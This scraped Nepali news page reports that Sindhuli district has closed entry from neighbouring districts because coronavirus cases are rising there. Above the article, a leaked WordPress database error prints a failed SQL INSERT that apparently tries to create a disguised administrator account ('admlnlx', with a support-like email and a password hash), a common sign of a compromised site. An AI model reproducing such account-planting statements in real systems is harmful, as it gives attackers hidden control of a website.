WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bd2Q3tFYr0mq4SO7UKv91BnsKgy4jd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:13:58', '', 'admlnlx', 'admlnlx')
जेठ १, काठमाडौं – जिल्ला प्रशासन कार्यालय सिन्धुलीले छिमेकी जिल्लासँगको आवतजावतलाई बन्द गर्ने निर्णय गरेको छ।
बुधबार जिल्ला प्रशासन कार्यालय सिन्धुलीमा बसेको सर्बदलीय बैठकले छिमकी जिल्लाबाट सिन्धुली प्रवेश पूर्णरुपमा बन्द गर्ने निर्णय गरेको अन्नपुर्ण पोस्टमा खबर छ । कोरोना भाइरसको संक्रमण बढ्दै गएपछि जिल्लामा सतर्कता अपनाउँन यस्तो निर्णय गरिएको जिल्ला प्रशासन कार्यालयका प्रशासकीय अधिकृत उपेन्द्र न्यौपानेले जानकारी दिए। न्यौपानेका अनुसार अन्य जिल्लासँग हुने आवतजावतलाई पुर्णरूपमा निरुत्साहित गर्नका लागि सुरक्षाकर्मी परिचालन गरिने र स्थानीयतहबाटसमेत पहल गरिनेछ ।
छिमेकी जिल्लाहरु उदयपुर, धनुषा, महोत्तरी, सर्लाही, रौतहट लगायतमा कोराना भाइरसको संक्रमितहरु बढ्दै गएपछि जिल्लामा आवगमन बन्द गर्न यस्तो निर्णय गरिएको जनाइएको छ ।